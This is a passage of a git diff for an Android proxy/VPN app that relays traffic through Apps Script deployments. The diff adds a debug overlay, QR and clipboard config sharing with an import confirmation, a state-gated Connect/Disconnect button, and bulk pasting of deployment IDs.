+        tvElevated = TextView(context).apply {
+            setTextColor(Color.WHITE)
+            textSize = 10f
+        }
+        layout.addView(tvElevated)
+
+        tvBatches = TextView(context).apply {
+            setTextColor(Color.WHITE)
+            textSize = 10f
+        }
+        layout.addView(tvBatches)
+
+        tvEvents = TextView(context).apply {
+            setTextColor(Color.argb(200, 200, 200, 200))
+            textSize = 9f
+            maxLines = 8
+        }
+        layout.addView(tvEvents)
+
+        val params = WindowManager.LayoutParams(
+            WindowManager.LayoutParams.WRAP_CONTENT,
+            WindowManager.LayoutParams.WRAP_CONTENT,
+            WindowManager.LayoutParams.TYPE_APPLICATION_OVERLAY,
+            WindowManager.LayoutParams.FLAG_NOT_FOCUSABLE or
+                WindowManager.LayoutParams.FLAG_NOT_TOUCH_MODAL,
+            PixelFormat.TRANSLUCENT,
+        ).apply {
+            gravity = Gravity.TOP or Gravity.START
+            x = dp(8)
+            y = dp(80)
+        }
+
+        // Draggable
+        var startX = 0
+        var startY = 0
+        var startTouchX = 0f
+        var startTouchY = 0f
+        layout.setOnTouchListener { _, event ->
+            when (event.action) {
+                MotionEvent.ACTION_DOWN -> {
+                    startX = params.x
+                    startY = params.y
+                    startTouchX = event.rawX
+                    startTouchY = event.rawY
+                    true
+                }
+                MotionEvent.ACTION_MOVE -> {
+                    params.x = startX + (event.rawX - startTouchX).toInt()
+                    params.y = startY + (event.rawY - startTouchY).toInt()
+                    wm.updateViewLayout(layout, params)
+                    true
+                }
+                else -> false
+            }
+        }
+
+        root = layout
+        wm.addView(layout, params)
+        schedulePoll()
+    }
+
+    fun hide() {
+        handler.removeCallbacksAndMessages(null)
+        root?.let {
+            try { wm.removeView(it) } catch (_: Throwable) {}
+        }
+        root = null
+    }
+
+    private fun schedulePoll() {
+        handler.postDelayed(::poll, pollInterval)
+    }
+
+    private fun poll() {
+        if (root == null) return
+        Thread {
+            try {
+                val json = Native.pipelineDebugJson()
+                handler.post { applyJson(json) }
+            } catch (_: Throwable) {}
+            schedulePoll()
+        }.start()
+    }
+
+    private fun applyJson(json: String) {
+        if (root == null) return
+        try {
+            if (json.isNotBlank()) {
+                val obj = JSONObject(json)
+                val elevated = obj.optInt("elevated", 0)
+                val maxElev = obj.optInt("max_elevated", 0)
+                val batches = obj.optInt("active_batches", 0)
+                val maxBatch = obj.optInt("max_batch_slots", 0)
+
+                val sessions = obj.optInt("active_sessions", 0)
+                tvElevated.text = "Sessions: $sessions  Elevated: $elevated / $maxElev"
+                tvBatches.text = "Batches: $batches / $maxBatch"
+
+                val sessArr = obj.optJSONArray("sessions")
+                val sessLines = if (sessArr != null && sessArr.length() > 0) {
+                    (0 until sessArr.length()).joinToString("\n") { i ->
+                        val s = sessArr.getJSONObject(i)
+                        val sid = s.optString("sid", "?")
+                        val d = s.optInt("depth", 0)
+                        val inf = s.optInt("inflight", 0)
+                        val e = if (s.optBoolean("elevated", false)) " E" else ""
+                        "$sid d=$d f=$inf$e"
+                    }
+                } else ""
+
+                val arr = obj.optJSONArray("events")
+                val evtLines = if (arr != null && arr.length() > 0) {
+                    val start = maxOf(0, arr.length() - 5)
+                    (start until arr.length()).joinToString("\n") { arr.getString(it) }
+                } else ""
+
+                tvEvents.text = listOf(sessLines, evtLines).filter { it.isNotEmpty() }.joinToString("\n---\n")
+            }
+        } catch (_: Throwable) {}
+    }
+}
diff --git a/android/app/src/main/java/com/therealaleph/mhrv/ui/AppPickerDialog.kt b/android/app/src/main/java/com/therealaleph/mhrv/ui/AppPickerDialog.kt
index b4de133d..537a67a1 100644
--- a/android/app/src/main/java/com/therealaleph/mhrv/ui/AppPickerDialog.kt
+++ b/android/app/src/main/java/com/therealaleph/mhrv/ui/AppPickerDialog.kt
@@ -61,11 +61,19 @@ fun AppPickerDialog(
     }
 
     val filtered: List<AppEntry> = remember(apps, query) {
-        if (query.isBlank()) apps
+        val base = if (query.isBlank()) apps
         else apps.filter {
             it.label.contains(query, ignoreCase = true) ||
                 it.packageName.contains(query, ignoreCase = true)
         }
+        // Pre-selected packages float to the top so the user can find what
+        // they already chose without scrolling the whole list. The sort
+        // key uses `initial` (the set passed when the dialog opened), not
+        // the live `selected` state — re-checking inside the dialog must
+        // not reorder rows under the user's finger. The new ordering takes
+        // effect the next time the dialog opens. Stable sort preserves
+        // the alphabetical-by-label order within each group.
+        base.sortedByDescending { it.packageName in initial }
     }
 
     AlertDialog(
diff --git a/android/app/src/main/java/com/therealaleph/mhrv/ui/ConfigSharing.kt b/android/app/src/main/java/com/therealaleph/mhrv/ui/ConfigSharing.kt
new file mode 100644
index 00000000..966030ca
--- /dev/null
+++ b/android/app/src/main/java/com/therealaleph/mhrv/ui/ConfigSharing.kt
@@ -0,0 +1,319 @@
+package com.therealaleph.mhrv.ui
+
+import android.app.Activity
+import android.graphics.Bitmap
+import android.graphics.Color
+import androidx.activity.compose.rememberLauncherForActivityResult
+import androidx.activity.result.contract.ActivityResultContracts
+import androidx.compose.foundation.Image
+import androidx.compose.foundation.layout.*
+import androidx.compose.foundation.rememberScrollState
+import androidx.compose.foundation.verticalScroll
+import androidx.compose.material.icons.Icons
+import androidx.compose.material.icons.filled.ContentPaste
+import androidx.compose.material.icons.filled.QrCode
+import androidx.compose.material.icons.filled.QrCodeScanner
+import androidx.compose.material.icons.filled.Share
+import androidx.compose.material3.*
+import androidx.compose.runtime.*
+import androidx.compose.ui.Alignment
+import androidx.compose.ui.Modifier
+import androidx.compose.ui.graphics.asImageBitmap
+import androidx.compose.ui.platform.LocalClipboardManager
+import androidx.compose.ui.platform.LocalContext
+import androidx.compose.ui.res.stringResource
+import androidx.compose.ui.text.AnnotatedString
+import androidx.compose.ui.unit.dp
+import androidx.compose.ui.window.Dialog
+import com.google.zxing.BarcodeFormat
+import com.google.zxing.qrcode.QRCodeWriter
+import com.journeyapps.barcodescanner.ScanContract
+import com.journeyapps.barcodescanner.ScanOptions
+import com.therealaleph.mhrv.ConfigStore
+import com.therealaleph.mhrv.MhrvConfig
+import androidx.compose.foundation.text.selection.SelectionContainer
+import com.therealaleph.mhrv.R
+import kotlinx.coroutines.launch
+
+// =========================================================================
+// Import/Export bar — shown at the top of the config screen.
+// =========================================================================
+
+@Composable
+fun ConfigSharingBar(
+    cfg: MhrvConfig,
+    onImport: (MhrvConfig) -> Unit,
+    onSnackbar: suspend (String) -> Unit,
+) {
+    // Deep link import — requires confirmation before applying.
+    val deepLinkCfg by com.therealaleph.mhrv.MainActivity.pendingDeepLinkConfig
+    if (deepLinkCfg != null) {
+        ImportConfirmDialog(
+            cfg = deepLinkCfg!!,
+            onConfirm = {
+                onImport(deepLinkCfg!!)
+                com.therealaleph.mhrv.MainActivity.pendingDeepLinkConfig.value = null
+            },
+            onDismiss = {
+                com.therealaleph.mhrv.MainActivity.pendingDeepLinkConfig.value = null
+            },
+        )
+    }
+    val ctx = LocalContext.current
+    val clipboard = LocalClipboardManager.current
+    val scope = rememberCoroutineScope()
+
+    var showExportDialog by remember { mutableStateOf(false) }
+    var showImportConfirm by remember { mutableStateOf(false) }
+    var pendingImport by remember { mutableStateOf<MhrvConfig?>(null) }
+
+    // QR scanner launcher — fires the ZXing embedded scanner activity.
+    val scanLauncher = rememberLauncherForActivityResult(ScanContract()) { result ->
+        val scanned = result.contents ?: return@rememberLauncherForActivityResult
+        val decoded = ConfigStore.decode(scanned)
+        if (decoded != null) {
+            pendingImport = decoded
+            showImportConfirm = true
+        } else {
+            scope.launch { onSnackbar(ctx.getString(R.string.snack_invalid_config)) }
+        }
+    }
+
+    // --- Export + Paste + Scan row ---
+    Row(
+        modifier = Modifier.fillMaxWidth(),
+        horizontalArrangement = Arrangement.spacedBy(8.dp),
+    ) {
+        IconButton(onClick = { showExportDialog = true }) {
+            Icon(Icons.Default.Share, contentDescription = stringResource(R.string.btn_export_config))
+        }
+        // Manual paste — reads clipboard on tap. Android 13+ restricts
+        // background clipboard access, so auto-detect doesn't work.
+        // User interaction (tap) grants clipboard permission.
+        OutlinedButton(
+            onClick = {
+                val text = clipboard.getText()?.text.orEmpty()
+                val decoded = ConfigStore.decode(text)
+                if (decoded != null) {
+                    pendingImport = decoded
+                    showImportConfirm = true
+                } else {
+                    scope.launch { onSnackbar(ctx.getString(R.string.snack_invalid_config)) }
+                }
+            },
+        ) {
+            Icon(Icons.Default.ContentPaste, null, modifier = Modifier.size(18.dp))
+            Spacer(Modifier.width(4.dp))
+            Text("Paste")
+        }
+        OutlinedButton(
+            onClick = {
+                val opts = ScanOptions().apply {
+                    setDesiredBarcodeFormats(ScanOptions.QR_CODE)
+                    setPrompt("Scan mhrv config QR code")
+                    setBeepEnabled(false)
+                    setOrientationLocked(true)
+                }
+                scanLauncher.launch(opts)
+            },
+        ) {
+            Icon(Icons.Default.QrCodeScanner, null, modifier = Modifier.size(18.dp))
+            Spacer(Modifier.width(4.dp))
+            Text(stringResource(R.string.btn_scan_qr))
+        }
+    }
+
+    // --- Export dialog (QR + hash + copy in one) ---
+    if (showExportDialog) {
+        val encoded = remember(cfg) { ConfigStore.encode(cfg) }
+        val qrBitmap = remember(encoded) { generateQr(encoded, 512) }
+        Dialog(onDismissRequest = { showExportDialog = false }) {
+            Card(modifier = Modifier.padding(16.dp)) {
+                Column(
+                    modifier = Modifier
+                        .padding(24.dp)
+                        .verticalScroll(rememberScrollState()),
+                    horizontalAlignment = Alignment.CenterHorizontally,
+                    verticalArrangement = Arrangement.spacedBy(12.dp),
+                ) {
+                    Text(
+                        stringResource(R.string.dialog_export_title),
+                        style = MaterialTheme.typography.titleMedium,
+                    )
+                    Text(
+                        stringResource(R.string.dialog_export_warning),
+                        style = MaterialTheme.typography.bodySmall,
+                        color = MaterialTheme.colorScheme.error,
+                    )
+
+                    // QR code
+                    if (qrBitmap != null) {
+                        Image(
+                            bitmap = qrBitmap.asImageBitmap(),
+                            contentDescription = "QR code",
+                            modifier = Modifier.size(260.dp),
+                        )
+                    } else {
+                        Text(
+                            "Config too large for QR code",
+                            style = MaterialTheme.typography.bodySmall,
+                        )
+                    }
+
+                    // Hash with copy button
+                    Row(
+                        modifier = Modifier.fillMaxWidth(),
+                        verticalAlignment = Alignment.CenterVertically,
+                    ) {
+                        SelectionContainer(modifier = Modifier.weight(1f)) {
+                            Text(
+                                encoded,
+                                style = MaterialTheme.typography.bodySmall,
+                                maxLines = 3,
+                                overflow = androidx.compose.ui.text.style.TextOverflow.Ellipsis,
+                            )
+                        }
+                        IconButton(onClick = {
+                            clipboard.setText(AnnotatedString(encoded))
+                            scope.launch { onSnackbar(ctx.getString(R.string.snack_config_copied)) }
+                        }) {
+                            Icon(
+                                Icons.Default.ContentPaste,
+                                contentDescription = stringResource(R.string.btn_copy),
+                                modifier = Modifier.size(20.dp),
+                            )
+                        }
+                    }
+
+                    // Action buttons
+                    Row(
+                        modifier = Modifier.fillMaxWidth(),
+                        horizontalArrangement = Arrangement.spacedBy(8.dp, Alignment.CenterHorizontally),
+                    ) {
+                        OutlinedButton(onClick = {
+                            // Save QR bitmap to cache dir and share both image + text.
+                            val intent = if (qrBitmap != null) {
+                                val file = java.io.File(ctx.cacheDir, "mhrv-config-qr.png")
+                                file.outputStream().use { qrBitmap.compress(Bitmap.CompressFormat.PNG, 100, it) }
+                                val uri = androidx.core.content.FileProvider.getUriForFile(
+                                    ctx, "${ctx.packageName}.fileprovider", file
+                                )
+                                android.content.Intent(android.content.Intent.ACTION_SEND).apply {
+                                    type = "image/png"
+                                    putExtra(android.content.Intent.EXTRA_STREAM, uri)
+                                    putExtra(android.content.Intent.EXTRA_TEXT, encoded)
+                                    addFlags(android.content.Intent.FLAG_GRANT_READ_URI_PERMISSION)
+                                }
+                            } else {
+                                android.content.Intent(android.content.Intent.ACTION_SEND).apply {
+                                    type = "text/plain"
+                                    putExtra(android.content.Intent.EXTRA_TEXT, encoded)
+                                }
+                            }
+                            ctx.startActivity(android.content.Intent.createChooser(intent, "Share config"))
+                        }) {
+                            Icon(Icons.Default.Share, null, modifier = Modifier.size(18.dp))
+                            Spacer(Modifier.width(4.dp))
+                            Text("Share")
+                        }
+                        TextButton(onClick = { showExportDialog = false }) {
+                            Text("Close")
+                        }
+                    }
+                }
+            }
+        }
+    }
+
+    // --- Import confirmation dialog (clipboard + QR scan) ---
+    if (showImportConfirm && pendingImport != null) {
+        ImportConfirmDialog(
+            cfg = pendingImport!!,
+            onConfirm = {
+                onImport(pendingImport!!)
+                clipboard.setText(AnnotatedString(""))
+                showImportConfirm = false
+                pendingImport = null
+                scope.launch { onSnackbar(ctx.getString(R.string.snack_config_imported)) }
+            },
+            onDismiss = {
+                showImportConfirm = false
+                pendingImport = null
+            },
+        )
+    }
+}
+
+// =========================================================================
+// Import confirmation dialog — shared by clipboard, QR scan, and deep link.
+// Shows deployment IDs, mode, and a trust warning before overwriting config.
+// =========================================================================
+
+@Composable
+private fun ImportConfirmDialog(
+    cfg: MhrvConfig,
+    onConfirm: () -> Unit,
+    onDismiss: () -> Unit,
+) {
+    val ids = cfg.appsScriptUrls.mapNotNull { url ->
+        val marker = "/macros/s/"
+        val i = url.indexOf(marker)
+        val raw = if (i >= 0) url.substring(i + marker.length).substringBefore("/") else url
+        raw.trim().takeIf { it.isNotEmpty() }
+    }
+    val preview = ids.take(3).joinToString("\n") { "  ${it.take(20)}…" }
+    val modeLabel = when (cfg.mode) {
+        com.therealaleph.mhrv.Mode.APPS_SCRIPT -> "apps_script"
+        com.therealaleph.mhrv.Mode.DIRECT -> "direct"
+        com.therealaleph.mhrv.Mode.FULL -> "full"
+    }
+
+    AlertDialog(
+        onDismissRequest = onDismiss,
+        title = { Text(stringResource(R.string.dialog_import_title)) },
+        text = {
+            Column(verticalArrangement = Arrangement.spacedBy(8.dp)) {
+                Text(
+                    "Importing routes your traffic through the deployment IDs in this config. Only import from trusted sources.",
+                    style = MaterialTheme.typography.bodySmall,
+                    color = MaterialTheme.colorScheme.error,
+                )
+                Text(
+                    "Mode: $modeLabel\nDeployments: ${ids.size}\n$preview",
+                    style = MaterialTheme.typography.bodySmall,
+                )
+                Text(
+                    stringResource(R.string.dialog_import_body),
+                    style = MaterialTheme.typography.bodySmall,
+                )
+            }
+        },
+        confirmButton = {
+            TextButton(onClick = onConfirm) { Text("Import") }
+        },
+        dismissButton = {
+            TextButton(onClick = onDismiss) { Text(stringResource(R.string.btn_cancel)) }
+        },
+    )
+}
+
+// =========================================================================
+// QR code generation
+// =========================================================================
+
+private fun generateQr(content: String, size: Int): Bitmap? {
+    return try {
+        val writer = QRCodeWriter()
+        val matrix = writer.encode(content, BarcodeFormat.QR_CODE, size, size)
+        val bitmap = Bitmap.createBitmap(size, size, Bitmap.Config.RGB_565)
+        for (x in 0 until size) {
+            for (y in 0 until size) {
+                bitmap.setPixel(x, y, if (matrix[x, y]) Color.BLACK else Color.WHITE)
+            }
+        }
+        bitmap
+    } catch (_: Throwable) {
+        null // Config too large for QR
+    }
+}
+
diff --git a/android/app/src/main/java/com/therealaleph/mhrv/ui/HomeScreen.kt b/android/app/src/main/java/com/therealaleph/mhrv/ui/HomeScreen.kt
index dd69ffda..b06bc5cf 100644
--- a/android/app/src/main/java/com/therealaleph/mhrv/ui/HomeScreen.kt
+++ b/android/app/src/main/java/com/therealaleph/mhrv/ui/HomeScreen.kt
@@ -1,5 +1,6 @@
 package com.therealaleph.mhrv.ui
 
+import android.widget.Toast
 import androidx.compose.animation.AnimatedVisibility
 import androidx.compose.foundation.background
 import androidx.compose.foundation.layout.*
@@ -9,6 +10,7 @@ import androidx.compose.foundation.lazy.rememberLazyListState
 import androidx.compose.foundation.rememberScrollState
 import androidx.compose.foundation.shape.RoundedCornerShape
 import androidx.compose.foundation.text.KeyboardOptions
+import androidx.compose.foundation.text.selection.SelectionContainer
 import androidx.compose.foundation.verticalScroll
 import androidx.compose.material.icons.Icons
 import androidx.compose.material.icons.filled.CheckCircle
@@ -23,7 +25,9 @@ import androidx.compose.runtime.saveable.rememberSaveable
 import androidx.compose.ui.Alignment
 import androidx.compose.ui.Modifier
 import androidx.compose.ui.draw.clip
+import androidx.compose.ui.platform.LocalClipboardManager
 import androidx.compose.ui.platform.LocalContext
+import androidx.compose.ui.text.AnnotatedString
 import androidx.compose.ui.text.font.FontFamily
 import androidx.compose.ui.text.input.ImeAction
 import androidx.compose.ui.text.input.KeyboardType
@@ -46,8 +50,10 @@ import com.therealaleph.mhrv.ui.theme.ErrRed
 import com.therealaleph.mhrv.ui.theme.OkGreen
 import kotlinx.coroutines.Dispatchers
 import kotlinx.coroutines.delay
+import kotlinx.coroutines.flow.first
 import kotlinx.coroutines.launch
 import kotlinx.coroutines.withContext
+import kotlinx.coroutines.withTimeoutOrNull
 import org.json.JSONObject
 
 /**
@@ -69,9 +75,11 @@ sealed class CaInstallOutcome {
 /**
  * Top-level screen. Intentionally one scrollable page rather than tabs —
  * first-run users need to see everything (deployment IDs, cert button,
- * Start) on one surface. Anything that isn't first-run critical lives in
- * collapsible sections (SNI pool, Advanced, Logs) so the default view
- * stays short.
+ * Connect) on one surface. The Connect/Disconnect button sits right under
+ * the Mode dropdown so a long deployment-ID list can't push it off-screen
+ * for daily-use taps. Anything that isn't first-run critical (Apps Script
+ * setup once filled, SNI pool, Advanced, Logs) lives in collapsible
+ * sections so the default view stays short.
  */
 @OptIn(ExperimentalMaterial3Api::class)
 @Composable
@@ -122,18 +130,31 @@ fun HomeScreen(
         }
     }
 
-    // Cooldown on Start/Stop. Rapid taps during a VPN transition trigger
-    // an emulator-specific EGL renderer crash
-    // (F OpenGLRenderer: EGL_NOT_INITIALIZED during rendering) — the
-    // service survives, but the Compose UI process dies and the app
-    // appears to close. On real hardware this is rare, but debouncing
-    // is useful UX anyway: neither start nor stop is truly instant,
-    // and the user gets no feedback if they tap while one is in flight.
-    var transitionCooldown by remember { mutableStateOf(false) }
-    LaunchedEffect(transitionCooldown) {
-        if (transitionCooldown) {
-            delay(2000)
-            transitionCooldown = false
+    // Gate Start/Stop on the service's actual state transition rather
+    // than a fixed timer. The previous 2s cooldown was shorter than the
+    // worst-case teardown (Tun2proxy.stop + 4s join + 5s rt.shutdown_timeout
+    // ≈ 9s on the slowest path), which let the user fire a fresh Connect
+    // while the previous Stop's native cleanup was still releasing the
+    // listener port — the new startProxy then failed with "Address already
+    // in use".
+    //
+    // `awaitingRunning` holds the value we expect VpnState.isRunning to
+    // settle on after the user's action; null means "no transition in
+    // flight". The LaunchedEffect below suspends on the StateFlow until
+    // the predicate matches, with a 12s backstop in case the service
+    // failed before flipping the flag (e.g., establish() returned null).
+    // Side benefit: this also debounces the rapid-tap EGL renderer crash
+    // the old timer was guarding against.
+    var awaitingRunning by remember { mutableStateOf<Boolean?>(null) }
+    val transitioning = awaitingRunning != null
+    LaunchedEffect(awaitingRunning) {
+        val target = awaitingRunning ?: return@LaunchedEffect
+        try {
+            withTimeoutOrNull(12_000) {
+                VpnState.isRunning.first { it == target }
+            }
+        } finally {
+            awaitingRunning = null
         }
     }
 
@@ -229,34 +250,124 @@ fun HomeScreen(
                 .padding(16.dp),
             verticalArrangement = Arrangement.spacedBy(12.dp),
         ) {
+            // Config import/export bar — paste from clipboard + export + QR.
+            ConfigSharingBar(
+                cfg = cfg,
+                onImport = { persist(it) },
+                onSnackbar = { snackbar.showSnackbar(it) },
+            )
+
             SectionHeader("Mode")
             ModeDropdown(
                 mode = cfg.mode,
                 onChange = { persist(cfg.copy(mode = it)) },
             )
 
+            // Connect/Disconnect lives right under Mode so users with a long
+            // deployment-ID list don't have to scroll past it on every
+            // session. Disabled state still acts as the "you're not set up
+            // yet" signal — they'll expand the Apps Script section below to
+            // resolve it.
+            val isVpnRunning by VpnState.isRunning.collectAsState()
+            Button(
+                onClick = {
+                    if (isVpnRunning) {
+                        awaitingRunning = false
+                        onStop()
+                    } else {
+                        awaitingRunning = true
+                        // Connect flow: auto-resolve google_ip so we don't
+                        // hand the proxy a stale anycast target; repair
+                        // front_domain if it got corrupted into an IP
+                        // (SNI has to be a hostname); then fire onStart.
+                        // All three steps go through the Compose persist()
+                        // so a subsequent field edit can't overwrite the
+                        // fresh values with pre-resolve ones.
+                        scope.launch {
+                            // Only auto-fill google_ip if it's empty.
+                            // Issue #71: some Iranian ISPs return
+                            // poisoned A records for www.google.com that
+                            // resolve but then refuse TLS (or route to a
+                            // Google IP that's not on the GFE and can't
+                            // handle our SNI-rewrite). If the user has
+                            // manually set a working IP
+                            // (e.g. 216.239.38.120), we must NOT
+                            // overwrite it with a poisoned fresh lookup
+                            // just because the two values differ. They
+                            // can still force a re-resolve via the
+                            // explicit "Auto-detect" button above.
+                            var updated = cfg
+                            if (updated.googleIp.isBlank()) {
+                                val fresh = withContext(Dispatchers.IO) {
+                                    NetworkDetect.resolveGoogleIp()
+                                }
+                                if (!fresh.isNullOrBlank()) {
+                                    updated = updated.copy(googleIp = fresh)
+                                }
+                            }
+                            if (updated.frontDomain.isBlank() ||
+                                updated.frontDomain.parseAsIpOrNull() != null
+                            ) {
+                                updated = updated.copy(frontDomain = "www.google.com")
+                            }
+                            if (updated !== cfg) persist(updated)
+                            onStart()
+                        }
+                    }
+                },
+                enabled = (isVpnRunning ||
+                    cfg.mode == Mode.DIRECT ||
+                    (cfg.hasDeploymentId && cfg.authKey.isNotBlank())) && !transitioning,
+                colors = ButtonDefaults.buttonColors(
+                    containerColor = if (isVpnRunning) ErrRed else OkGreen,
+                    contentColor = androidx.compose.ui.graphics.Color.White,
+                    disabledContainerColor = MaterialTheme.colorScheme.surfaceVariant,
+                ),
+                modifier = Modifier
+                    .fillMaxWidth()
+                    .heightIn(min = 52.dp),
+            ) {
+                Text(
+                    when {
+                        transitioning -> "…"
+                        isVpnRunning -> stringResource(R.string.btn_disconnect)
+                        else -> stringResource(R.string.btn_connect)
+                    },
+                    style = MaterialTheme.typography.titleMedium,
+                )
+            }
+
             Spacer(Modifier.height(4.dp))
-            SectionHeader(stringResource(R.string.sec_apps_script_relay))
 
             val appsScriptEnabled = cfg.mode == Mode.APPS_SCRIPT || cfg.mode == Mode.FULL
-            DeploymentIdsField(
-                urls = cfg.appsScriptUrls,
-                onChange = { persist(cfg.copy(appsScriptUrls = it)) },
-                enabled = appsScriptEnabled,
-            )
+            // Wrapped in a collapsible so a long ID list (10+ deployments
+            // is normal in full-tunnel rotations) doesn't dominate the
+            // screen once it's set up. Starts expanded for first-run users
+            // (no IDs/key yet) so the form is immediately discoverable.
+            CollapsibleSection(
+                title = stringResource(R.string.sec_apps_script_relay),
+                initiallyExpanded = appsScriptEnabled &&
+                    (cfg.appsScriptUrls.isEmpty() || cfg.authKey.isBlank()),
+            ) {
+                DeploymentIdsField(
+                    urls = cfg.appsScriptUrls,
+                    onChange = { persist(cfg.copy(appsScriptUrls = it)) },
+                    enabled = appsScriptEnabled,
+                )
 
-            OutlinedTextField(
-                value = cfg.authKey,
-                onValueChange = { persist(cfg.copy(authKey = it)) },
-                label = { Text(stringResource(R.string.field_auth_key)) },
-                singleLine = true,
-                enabled = appsScriptEnabled,
-                keyboardOptions = KeyboardOptions(imeAction = ImeAction.Next),
-                modifier = Modifier.fillMaxWidth(),
-                supportingText = {
-                    Text(stringResource(R.string.help_auth_key))
-                },
-            )
+                OutlinedTextField(
+                    value = cfg.authKey,
+                    onValueChange = { persist(cfg.copy(authKey = it)) },
+                    label = { Text(stringResource(R.string.field_auth_key)) },
+                    singleLine = true,
+                    enabled = appsScriptEnabled,
+                    keyboardOptions = KeyboardOptions(imeAction = ImeAction.Next),
+                    modifier = Modifier.fillMaxWidth(),
+                    supportingText = {
+                        Text(stringResource(R.string.help_auth_key))
+                    },
+                )
+            }
 
             Spacer(Modifier.height(4.dp))
             SectionHeader(stringResource(R.string.sec_network))
@@ -360,89 +471,10 @@ fun HomeScreen(
             }
 
             Spacer(Modifier.height(8.dp))
-
-            // Unified Connect/Disconnect button. Color + label track the
-            // service's real "is it running right now" state (via
-            // `VpnState.isRunning`), so the UI never shows "Connect" while
-            // the tunnel is still up or "Disconnect" after the service
-            // finished tearing down. Two tap paths, one button:
-            //   - running=false → green "Connect" → runs the auto-resolve
-            //     + persist + onStart() sequence we used to hang off the
-            //     old Start button.
-            //   - running=true  → red "Disconnect" → fires onStop().
-            val isVpnRunning by VpnState.isRunning.collectAsState()
-            Button(
-                onClick = {
-                    transitionCooldown = true
-                    if (isVpnRunning) {
-                        onStop()
-                    } else {
-                        // Connect flow: auto-resolve google_ip so we don't
-                        // hand the proxy a stale anycast target; repair
-                        // front_domain if it got corrupted into an IP
-                        // (SNI has to be a hostname); then fire onStart.
-                        // All three steps go through the Compose persist()
-                        // so a subsequent field edit can't overwrite the
-                        // fresh values with pre-resolve ones.
-                        scope.launch {
-                            // Only auto-fill google_ip if it's empty.
-                            // Issue #71: some Iranian ISPs return
-                            // poisoned A records for www.google.com that
-                            // resolve but then refuse TLS (or route to a
-                            // Google IP that's not on the GFE and can't
-                            // handle our SNI-rewrite). If the user has
-                            // manually set a working IP
-                            // (e.g. 216.239.38.120), we must NOT
-                            // overwrite it with a poisoned fresh lookup
-                            // just because the two values differ. They
-                            // can still force a re-resolve via the
-                            // explicit "Auto-detect" button above.
-                            var updated = cfg
-                            if (updated.googleIp.isBlank()) {
-                                val fresh = withContext(Dispatchers.IO) {
-                                    NetworkDetect.resolveGoogleIp()
-                                }
-                                if (!fresh.isNullOrBlank()) {
-                                    updated = updated.copy(googleIp = fresh)
-                                }
-                            }
-                            if (updated.frontDomain.isBlank() ||
-                                updated.frontDomain.parseAsIpOrNull() != null
-                            ) {
-                                updated = updated.copy(frontDomain = "www.google.com")
-                            }
-                            if (updated !== cfg) persist(updated)
-                            onStart()
-                        }
-                    }
-                },
-                enabled = (isVpnRunning ||
-                    cfg.mode == Mode.GOOGLE_ONLY ||
-                    (cfg.hasDeploymentId && cfg.authKey.isNotBlank())) && !transitionCooldown,
-                colors = ButtonDefaults.buttonColors(
-                    containerColor = if (isVpnRunning) ErrRed else OkGreen,
-                    contentColor = androidx.compose.ui.graphics.Color.White,
-                    disabledContainerColor = MaterialTheme.colorScheme.surfaceVariant,
-                ),
-                modifier = Modifier
-                    .fillMaxWidth()
-                    .heightIn(min = 52.dp),
-            ) {
-                Text(
-                    when {
-                        transitionCooldown -> "…"
-                        isVpnRunning -> stringResource(R.string.btn_disconnect)
-                        else -> stringResource(R.string.btn_connect)
-                    },
-                    style = MaterialTheme.typography.titleMedium,
-                )
-            }
-
-            Spacer(Modifier.height(4.dp))
-            // Secondary accent button — FilledTonalButton reads as a lower-
-            // priority action next to Start/Stop, matching the desktop UI's
-            // visual hierarchy where Install CA is offered as a helper
-            // button rather than the headline action.
+            // Secondary action — FilledTonalButton signals "helper" against
+            // the primary Connect/Disconnect button at the top. Kept down
+            // here because cert install is a one-time setup step; daily
+            // users never tap it again.
             FilledTonalButton(
                 onClick = { showInstallDialog = true },
                 modifier = Modifier.fillMaxWidth(),
@@ -459,6 +491,7 @@ fun HomeScreen(
             // client-side estimate only sees what this device relayed,
             // not what other devices on the same deployment consumed.
             UsageTodayCard()
+            PipelineDebugCard()
 
             CollapsibleSection(title = stringResource(R.string.sec_live_logs), initiallyExpanded = false) {
                 LiveLogPane()
@@ -698,9 +731,15 @@ private fun ConnectionModeDropdown(
 }
 
 // =========================================================================
-// Deployment IDs editor — one row per ID, with add/remove buttons.
+// Deployment IDs editor — one row per ID, with add/remove buttons. The
+// "+ Add" field accepts a single ID OR a bulk paste of many separated by
+// whitespace / newline / comma / semicolon — useful when migrating from
+// the desktop config or pasting a freshly-deployed batch (issue: bulk add).
 // =========================================================================
 
+/** Split a bulk-pasted blob into individual entries. */
+private val ID_SEPARATORS = Regex("[\\s,;]+")
+
 @Composable
 private fun DeploymentIdsField(
     urls: List<String>,
@@ -716,6 +755,8 @@ private fun DeploymentIdsField(
         )
 
         // Existing entries — each with its own row and a remove button.
+        // A bulk paste into an existing row also expands into multiple
+        // entries, so users don't have to find the "+ Add" field to do it.
         urls.forEachIndexed { index, url ->
             Row(
                 verticalAlignment = Alignment.CenterVertically,
@@ -724,8 +765,18 @@ private fun DeploymentIdsField(
                 OutlinedTextField(
                     value = url,
                     onValueChange = { edited ->
+                        val parts = edited.split(ID_SEPARATORS).filter { it.isNotBlank() }
                         val updated = urls.toMutableList()
-                        updated[index] = edited
+                        if (parts.size > 1) {
+                            // Bulk paste into this row: expand in place.
+                            updated.removeAt(index)
+                            updated.addAll(index, parts)
+                        } else {
+                            // Normal typing — preserve raw input so the
+                            // caret/whitespace doesn't get reformatted on
+                            // every keystroke.
+                            updated[index] = edited
+                        }
                         onChange(updated)
                     },
                     enabled = enabled,
@@ -745,9 +796,11 @@ private fun DeploymentIdsField(
             }
         }
 
-        // "Add" row: text field + button.
+        // "Add" row: multi-line text field + button. Multi-line so a user
+        // can paste a long list at once (newline-separated is the natural
+        // form when copying out of the desktop UI's textarea).
         Row(
-            verticalAlignment = Alignment.CenterVertically,
+            verticalAlignment = Alignment.Top,
             modifier = Modifier.fillMaxWidth(),
         ) {
             OutlinedTextField(
@@ -755,15 +808,17 @@ private fun DeploymentIdsField(
                 onValueChange = { newEntry = it },
                 enabled = enabled,
                 modifier = Modifier.weight(1f),
-                singleLine = true,
-                placeholder = { Text("Paste URL or ID") },
+                singleLine = false,
+                minLines = 1,
+                maxLines = 6,
+                placeholder = { Text(stringResource(R.string.placeholder_paste_ids)) },
             )
             Spacer(Modifier.width(8.dp))
             Button(
                 onClick = {
-                    val trimmed = newEntry.trim()
-                    if (trimmed.isNotBlank()) {
-                        onChange(urls + trimmed)
+                    val parts = newEntry.split(ID_SEPARATORS).filter { it.isNotBlank() }
+                    if (parts.isNotEmpty()) {
+                        onChange(urls + parts)
                         newEntry = ""
                     }
                 },
